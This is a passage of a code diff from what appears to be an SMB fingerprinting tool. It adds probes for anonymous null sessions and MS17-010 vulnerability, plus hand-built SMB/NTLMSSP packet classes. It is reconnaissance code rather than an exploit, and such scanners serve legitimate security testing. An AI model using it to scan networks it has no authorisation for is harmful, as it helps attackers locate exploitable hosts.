|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
s.close()
|
||||
if data[8:10] == "\x73\x16":
|
||||
OsVersion, ClientVersion = OsNameClientVersion(data)
|
||||
return signing, OsVersion, ClientVersion
|
||||
except:
|
||||
pass
|
||||
|
||||
##################
|
||||
#run it
|
||||
def ShowResults(Host):
|
||||
|
||||
def SmbNullSession(Host):
|
||||
s = socket(AF_INET, SOCK_STREAM)
|
||||
try:
|
||||
s.settimeout(Timeout)
|
||||
s.connect(Host)
|
||||
except:
|
||||
return False
|
||||
pass
|
||||
|
||||
try:
|
||||
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x53\xc8")
|
||||
n = SMBNego(Data = SMBNegoData())
|
||||
n.calculate()
|
||||
packet0 = str(h)+str(n)
|
||||
buffer0 = longueur(packet0)+packet0
|
||||
s.send(buffer0)
|
||||
data = s.recv(2048)
|
||||
try:
|
||||
if data[8:10] == "\x72\x00":
|
||||
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x53\xc8")
|
||||
t = SMBSessionData()
|
||||
t.calculate()
|
||||
final = t
|
||||
packet1 = str(head)+str(final)
|
||||
buffer1 = longueur(packet1)+packet1
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
if data[8:10] == "\x73\x16":
|
||||
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x17\xc8",uid=data[32:34],mid="\x80\x00")
|
||||
t = SMBSession2()
|
||||
t.calculate()
|
||||
final = t
|
||||
packet1 = str(head)+str(final)
|
||||
buffer1 = longueur(packet1)+packet1
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
if data[8:10] == "\x73\x00":
|
||||
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",uid=data[32:34],mid="\xc0\x00")
|
||||
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
|
||||
t.calculate()
|
||||
packet1 = str(head)+str(t)
|
||||
buffer1 = longueur(packet1)+packet1
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
|
||||
if data[8:10] == "\x75\x00":
|
||||
global Guest
|
||||
Guest = True
|
||||
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",uid=data[32:34],tid=data[28:30],mid="\xc0\x00")
|
||||
t = SMBTransRAPData()
|
||||
t.calculate()
|
||||
packet1 = str(head)+str(t)
|
||||
buffer1 = longueur(packet1)+packet1
|
||||
s.send(buffer1)
|
||||
data = s.recv(2048)
|
||||
if data[9:13] == "\x05\x02\x00\xc0":
|
||||
return Guest, True
|
||||
else:
|
||||
return Guest, False
|
||||
else:
|
||||
return False, False
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
except:
|
||||
pass
|
||||
|
||||
##################
|
||||
#run it
|
||||
def ShowResults(Host):
|
||||
try:
|
||||
print "Retrieving information for %s..."%Host[0]
|
||||
Hostname, DomainJoined, Time = DomainGrab(Host)
|
||||
Signing, OsVer, LanManClient = SmbFinger(Host)
|
||||
NullSess, Ms17010 = SmbNullSession(Host)
|
||||
print "Retrieving information for %s..."%Host[0]
|
||||
print "SMB signing:", Signing
|
||||
print "Null Sessions Allowed:", NullSess
|
||||
print "Vulnerable to MS10-010:", Ms17010
|
||||
print "Server Time:", Time[1]
|
||||
print "Os version: '%s'\nLanman Client: '%s'"%(OsVer, LanManClient)
|
||||
print "Machine Hostname: '%s'\nThis machine is part of the '%s' domain\n"%(Hostname, DomainJoined)
|
||||
@@ -259,9 +246,11 @@ def ShowSmallResults(Host):
|
||||
try:
|
||||
Hostname, DomainJoined, Time = DomainGrab(Host)
|
||||
Signing, OsVer, LanManClient = SmbFinger(Host)
|
||||
Message = "['%s', Os:'%s', Domain:'%s', Signing:'%s', Time:'%s']"%(Host[0], OsVer, DomainJoined, Signing, Time[1])
|
||||
NullSess, Ms17010 = SmbNullSession(Host)
|
||||
Message = "['%s', Os:'%s', Domain:'%s', Signing:'%s', Time:'%s', Null Session: %s, MS17-010: %s]"%(Host[0], OsVer, DomainJoined, Signing, Time[1],NullSess, Ms17010)
|
||||
print Message
|
||||
except:
|
||||
raise
|
||||
pass
|
||||
|
||||
def IsGrepable():
|
||||
|
||||
410
tools/RunFingerPackets.py
Normal file
410
tools/RunFingerPackets.py
Normal file
@@ -0,0 +1,410 @@
|
||||
import random, struct
|
||||
from socket import *
|
||||
from time import sleep
|
||||
from odict import OrderedDict
|
||||
|
||||
def longueur(payload):
|
||||
length = struct.pack(">i", len(''.join(payload)))
|
||||
return length
|
||||
|
||||
class Packet():
|
||||
fields = OrderedDict([
|
||||
])
|
||||
def __init__(self, **kw):
|
||||
self.fields = OrderedDict(self.__class__.fields)
|
||||
for k,v in kw.items():
|
||||
if callable(v):
|
||||
self.fields[k] = v(self.fields[k])
|
||||
else:
|
||||
self.fields[k] = v
|
||||
def __str__(self):
|
||||
return "".join(map(str, self.fields.values()))
|
||||
|
||||
class SMBHeader(Packet):
|
||||
fields = OrderedDict([
|
||||
("proto", "\xff\x53\x4d\x42"),
|
||||
("cmd", "\x72"),
|
||||
("error-code", "\x00\x00\x00\x00" ),
|
||||
("flag1", "\x00"),
|
||||
("flag2", "\x00\x00"),
|
||||
("pidhigh", "\x00\x00"),
|
||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("reserved", "\x00\x00"),
|
||||
("tid", "\x00\x00"),
|
||||
("pid", "\x00\x00"),
|
||||
("uid", "\x00\x00"),
|
||||
("mid", "\x00\x00"),
|
||||
])
|
||||
|
||||
class SMBNego(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x00"),
|
||||
("Bcc", "\x62\x00"),
|
||||
("Data", "")
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
|
||||
|
||||
class SMBNegoData(Packet):
|
||||
fields = OrderedDict([
|
||||
("BuffType","\x02"),
|
||||
("Dialect", "NT LM 0.12\x00"),
|
||||
])
|
||||
|
||||
class SMBSessionFingerData(Packet):
|
||||
fields = OrderedDict([
|
||||
("wordcount", "\x0c"),
|
||||
("AndXCommand", "\xff"),
|
||||
("reserved","\x00" ),
|
||||
("andxoffset", "\x00\x00"),
|
||||
("maxbuff","\x04\x11"),
|
||||
("maxmpx", "\x32\x00"),
|
||||
("vcnum","\x00\x00"),
|
||||
("sessionkey", "\x00\x00\x00\x00"),
|
||||
("securitybloblength","\x4a\x00"),
|
||||
("reserved2","\x00\x00\x00\x00"),
|
||||
("capabilities", "\xd4\x00\x00\xa0"),
|
||||
("bcc1","\xb1\x00"), #hardcoded len here and hardcoded packet below, no calculation, faster.
|
||||
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
|
||||
])
|
||||
|
||||
##Now Lanman
|
||||
class SMBHeaderLanMan(Packet):
|
||||
fields = OrderedDict([
|
||||
("proto", "\xff\x53\x4d\x42"),
|
||||
("cmd", "\x72"),
|
||||
("error-code", "\x00\x00\x00\x00" ),
|
||||
("flag1", "\x08"),
|
||||
("flag2", "\x01\xc8"),
|
||||
("pidhigh", "\x00\x00"),
|
||||
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("reserved", "\x00\x00"),
|
||||
("tid", "\x00\x00"),
|
||||
("pid", "\x3c\x1b"),
|
||||
("uid", "\x00\x00"),
|
||||
("mid", "\x00\x00"),
|
||||
])
|
||||
|
||||
#We grab the domain and hostname from the negotiate protocol answer, since it is in a Lanman dialect format.
|
||||
class SMBNegoDataLanMan(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x00"),
|
||||
("Bcc", "\x0c\x00"),#hardcoded len here and hardcoded packet below, no calculation, faster.
|
||||
("BuffType","\x02"),
|
||||
("Dialect", "NT LM 0.12\x00"),
|
||||
|
||||
])
|
||||
|
||||
class SMBSessionData(Packet):
|
||||
fields = OrderedDict([
|
||||
("wordcount", "\x0c"),
|
||||
("AndXCommand", "\xff"),
|
||||
("reserved","\x00" ),
|
||||
("andxoffset", "\xec\x00"),
|
||||
("maxbuff","\x04\x11"),
|
||||
("maxmpx", "\x32\x00"),
|
||||
("vcnum","\x00\x00"),
|
||||
("sessionkey", "\x00\x00\x00\x00"),
|
||||
("securitybloblength","\x4a\x00"),
|
||||
("reserved2","\x00\x00\x00\x00"),
|
||||
("capabilities", "\xd4\x00\x00\xa0"),
|
||||
("bcc1","\xb1\x00"),
|
||||
("ApplicationHeaderTag","\x60"),
|
||||
("ApplicationHeaderLen","\x48"),
|
||||
("AsnSecMechType","\x06"),
|
||||
("AsnSecMechLen","\x06"),
|
||||
("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
|
||||
("ChoosedTag","\xa0"),
|
||||
("ChoosedTagStrLen","\x3e"),
|
||||
("NegTokenInitSeqHeadTag","\x30"),
|
||||
("NegTokenInitSeqHeadLen","\x3c"),
|
||||
("NegTokenInitSeqHeadTag1","\xA0"),
|
||||
("NegTokenInitSeqHeadLen1","\x0e"),
|
||||
("NegTokenInitSeqNLMPTag","\x30"),
|
||||
("NegTokenInitSeqNLMPLen","\x0c"),
|
||||
("NegTokenInitSeqNLMPTag1","\x06"),
|
||||
("NegTokenInitSeqNLMPTag1Len","\x0a"),
|
||||
("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
||||
("NegTokenInitSeqNLMPTag2","\xa2"),
|
||||
("NegTokenInitSeqNLMPTag2Len","\x2a"),
|
||||
("NegTokenInitSeqNLMPTag2Octet","\x04"),
|
||||
("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
|
||||
("NegTokenInitSeqMechSignature","\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
|
||||
("NegTokenInitSeqMechMessageType","\x01\x00\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageFlags","\x07\x82\x08\xa2"),
|
||||
("NegTokenInitSeqMechMessageDomainNameLen","\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageDomainNameMaxLen","\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageDomainNameBuffOffset","\x00\x00\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageWorkstationNameLen","\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageWorkstationNameMaxLen","\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageWorkstationNameBuffOffset","\x00\x00\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
|
||||
("NegTokenInitSeqMechMessageVersionLow","\x01"),
|
||||
("NegTokenInitSeqMechMessageVersionBuilt","\x28\x0a"),
|
||||
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
|
||||
("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
|
||||
("nativeOs","Windows 2002 Service Pack 3 2600".encode('utf-16le')),
|
||||
("nativeOsterminator","\x00\x00"),
|
||||
("nativelan","Windows 2002 5.1".encode('utf-16le')),
|
||||
("nativelanterminator","\x00\x00\x00\x00"),
|
||||
|
||||
])
|
||||
def calculate(self):
|
||||
|
||||
data1 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
data2 = str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
|
||||
|
||||
data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
data7 = str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
data9 = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
|
||||
|
||||
data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
|
||||
|
||||
data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
|
||||
|
||||
## Packet len
|
||||
self.fields["andxoffset"] = struct.pack("<H", len(data9)+32)
|
||||
##Buff Len
|
||||
self.fields["securitybloblength"] = struct.pack("<H", len(data1))
|
||||
##Complete Buff Len
|
||||
self.fields["bcc1"] = struct.pack("<H", len(data5))
|
||||
##App Header
|
||||
self.fields["ApplicationHeaderLen"] = struct.pack("<B", len(data2))
|
||||
##Asn Field 1
|
||||
self.fields["AsnSecMechLen"] = struct.pack("<B", len(str(self.fields["AsnSecMechStr"])))
|
||||
##Asn Field 1
|
||||
self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
|
||||
##SpNegoTokenLen
|
||||
self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
|
||||
##NegoTokenInit
|
||||
self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10))
|
||||
## Tag0 Len
|
||||
self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
|
||||
## Tag0 Str Len
|
||||
self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
|
||||
## Tag2 Len
|
||||
self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack("<B", len(data6))
|
||||
## Tag3 Len
|
||||
self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack("<B", len(data7))
|
||||
|
||||
|
||||
#########################################################################################################
|
||||
class SMBSession2(Packet):
|
||||
fields = OrderedDict([
|
||||
("wordcount", "\x0c"),
|
||||
("AndXCommand", "\xff"),
|
||||
("reserved","\x00"),
|
||||
("andxoffset", "\xfa\x00"),
|
||||
("maxbuff","\x04\x11"),
|
||||
("maxmpx", "\x32\x00"),
|
||||
("vcnum","\x01\x00"),
|
||||
("sessionkey", "\x00\x00\x00\x00"),
|
||||
("securitybloblength","\x59\x00"),
|
||||
("reserved2","\x00\x00\x00\x00"),
|
||||
("capabilities", "\xd4\x00\x00\xa0"),
|
||||
("bcc1","\xbf\x00"),
|
||||
("ApplicationHeaderTag","\xa1"),
|
||||
("ApplicationHeaderLen","\x57"),
|
||||
("AsnSecMechType","\x30"),
|
||||
("AsnSecMechLen","\x55"),
|
||||
("ChoosedTag","\xa2"),
|
||||
("ChoosedTagLen","\x53"),
|
||||
("ChoosedTag1","\x04"),
|
||||
("ChoosedTag1StrLen","\x51"),
|
||||
("NLMPAuthMsgSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
|
||||
("NLMPAuthMsgMessageType","\x03\x00\x00\x00"),
|
||||
("NLMPAuthMsgLMChallengeLen","\x01\x00"),
|
||||
("NLMPAuthMsgLMChallengeMaxLen","\x01\x00"),
|
||||
("NLMPAuthMsgLMChallengeBuffOffset","\x50\x00\x00\x00"),
|
||||
("NLMPAuthMsgNtChallengeResponseLen","\x00\x00"),
|
||||
("NLMPAuthMsgNtChallengeResponseMaxLen","\x00\x00"),
|
||||
("NLMPAuthMsgNtChallengeResponseBuffOffset","\x51\x00\x00\x00"),
|
||||
("NLMPAuthMsgNtDomainNameLen","\x00\x00"),
|
||||
("NLMPAuthMsgNtDomainNameMaxLen","\x00\x00"),
|
||||
("NLMPAuthMsgNtDomainNameBuffOffset","\x48\x00\x00\x00"),
|
||||
("NLMPAuthMsgNtUserNameLen","\x00\x00"),
|
||||
("NLMPAuthMsgNtUserNameMaxLen","\x00\x00"),
|
||||
("NLMPAuthMsgNtUserNameBuffOffset","\x48\x00\x00\x00"),
|
||||
("NLMPAuthMsgNtWorkstationLen","\x08\x00"),
|
||||
("NLMPAuthMsgNtWorkstationMaxLen","\x08\x00"),
|
||||
